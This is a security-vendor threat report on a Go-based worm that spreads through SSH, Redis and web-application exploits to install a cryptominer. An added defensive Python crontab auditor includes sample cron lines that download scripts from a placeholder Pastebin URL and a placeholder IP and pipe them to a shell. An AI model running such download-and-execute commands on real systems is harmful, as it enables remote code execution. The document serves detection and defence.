
Golang-based Spreader Used in a Cryptocurrency-Mining Malware Campaign

  • Posted on: June 28, 2019 at 5:01 am
  • Posted in: Exploits, Vulnerabilities
  • Author: Trend Micro

by Augusto Remillano II and Mark Vicente

We found a Golang-based spreader being used in a campaign that drops a cryptocurrency miner payload. Golang, or Go, is an open source programming language that has been recently associated with malware activity. Trend Micro has been detecting the use of the spreader since May and saw it again in a campaign this month.

The spreader used in this campaign scans for machines running vulnerable software to propagate. The campaign’s attack chain is detailed below.

Figure 1. The attack infection chain

Technical details

The Golang-based spreader

This malware looks for several entry points through which it can spread to other systems: not only the common SSH service, but also several exploits. It does this with the Golang-based spreader (which Trend Micro detects as Trojan.Linux.GOSCAN.BB), which scans for the following:

  • SSH
  • Misconfigured Redis server
  • ThinkPHP exploit
  • Drupal exploit
  • Atlassian Confluence server (CVE-2019-3396)

A snapshot of the spreader’s code (shown in Figure 2) shows that it scans for a Redis port.

Figure 2. Code showing the use of Redis

Aside from using misconfigured Redis ports, the malware can also infect servers through vulnerable web applications, particularly ThinkPHP and Drupal. The code in the image below shows that it scans for CVE-2019-3396, a vulnerability in Atlassian’s Confluence server that was previously seen being used to distribute a different cryptocurrency-mining malware.

Figure 3. Code showing the use of several vulnerabilities

And finally, it also propagates through SSH ports, as seen in the code snapshot below.

Figure 4. Code showing the use of SSH to propagate

Other components

Once the malware reaches the system, it connects to Pastebin to download the dropper component (detected as Trojan.SH.SQUELL.CC). The dropper then downloads the TAR archive mysqli[.]tar[.]gz and extracts it. The archive contains the miner payload, the Golang-based scanner, and the other components needed, enumerated below:

  • Configuration file for the miner components
  • Trojan.SH.SQUELL.CB that will execute the miner and scanner
  • The Golang-based spreader
  • The miner
  • File used to determine the malware’s installation status

Aside from executing the miner and the scanner, Trojan.SH.SQUELL.CB performs several other actions. It tries to infect other systems through SSH. It disables security tools and clears the command history and logs. It also terminates any cryptocurrency-mining activity already running on the system by blocking its network traffic and killing its processes. For persistence, it installs itself as a system service and sets up a cron job that downloads and executes the latest version of the malware from Pastebin. All of these activities are shown in the code snapshots below.

Figure 5. Code showing the use of SSH to infect other systems

Figure 6. Code showing how the malware disables security tools

Figure 7. Code showing the command to clear history and logs

Figure 8. Code showing the malware eliminating other possibly installed miners in the system

Figure 9. Code showing the persistence mechanisms of the malware
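As an added illustration of how a defender can hunt for the cron-based persistence described above (example code written for this article, not the malware's code and not from the original post): it parses crontab entries and flags jobs that download remote content and pipe it straight into a shell, or that reference a raw Pastebin paste. The sample crontab, the Pastebin path and the 198.51.100.10 address are constructed placeholders; the service-based persistence the article also mentions is not covered here.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample crontab (not taken from the campaign); the Pastebin path is a placeholder.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * curl -fsSL https://pastebin.com/raw/PLACEHOLDER | sh
@reboot /usr/local/bin/backup.sh
*/5 * * * * wget -q -O- http://198.51.100.10/update.sh | bash
"""

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da|z)?sh\b")
PASTEBIN_RAW = re.compile(r"pastebin\.com/raw/", re.IGNORECASE)

# A finding is (line number, schedule, command, list of reasons).
Finding = Tuple[int, str, str, List[str]]

def split_entry(line: str) -> Optional[Tuple[str, str]]:
    """Return (schedule, command) for a crontab job; None for blank, comment and VAR=value lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    if stripped.startswith("@"):  # @reboot, @daily, ... use a single schedule field
        parts = stripped.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    if "=" in stripped.split()[0]:  # environment assignment, not a job
        return None
    parts = stripped.split(None, 5)  # five schedule fields, then the command
    return (" ".join(parts[:5]), parts[5]) if len(parts) == 6 else None

def audit_crontab(text: str) -> List[Finding]:
    """Flag jobs matching the download-and-execute persistence pattern described in the article."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), 1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        reasons = []
        if DOWNLOADER.search(command) and PIPE_TO_SHELL.search(command):
            reasons.append("downloads remote content and pipes it straight into a shell")
        if PASTEBIN_RAW.search(command):
            reasons.append("fetches a raw Pastebin paste")
        if reasons:
            findings.append((line_no, schedule, command, reasons))
    return findings
```

Run the same function over the output of `crontab -l` for each user and over the files under /etc/cron.d to review a host's scheduled jobs.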

Conclusion and security recommendations

This isn’t the first time a Golang-based tool has been used in a campaign. As mentioned earlier, we have been seeing the same Golang-based spreader since May, when it was also used for a different cryptocurrency-mining malware. The Go programming language was also used in a data-stealing malware earlier this year, as reported by Malwarebytes.

Go provides cybercriminals with easy cross-platform development, allowing them to infect both Linux and Windows machines. However, this characteristic is not unique to the language. Cybercriminals are possibly turning to Golang to make analysis of their malware more difficult, as it is less commonly used for malware than other languages.

Whatever the reason, users can reduce the effectiveness of a similar campaign by strengthening their network security and defenses. Here are some steps users can take to defend against similar threats:

  • Applying the necessary patches and updates as soon as they become available
  • Being mindful of the methods attackers use to spread malware and tailoring defenses against them
  • Changing system and device settings with security in mind to prevent unauthorized access

Trend Micro solutions

Trend Micro endpoint solutions such as the Trend Micro Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from threats such as cryptocurrency miners by detecting malicious files and blocking all related malicious URLs. Enterprises can also monitor all ports and network protocols for advanced threats with the Trend Micro Deep Discovery™ Inspector network appliance.

Trend Micro™ Deep Discovery™ Inspector protects customers from the mentioned exploits through these rules:

  • 2573: MINER – TCP (Request)
  • 2626: CVE-2018-7600 – Drupal Remote Code Execution – HTTP (Request)
  • 2786: ThinkPHP 5x Remote Code Execution – HTTP (Request)
  • 2887: CVE-2019-3396 – ATLASSIAN CONFLUENCE – HTTP (Request)

Indicators of compromise (IoCs):

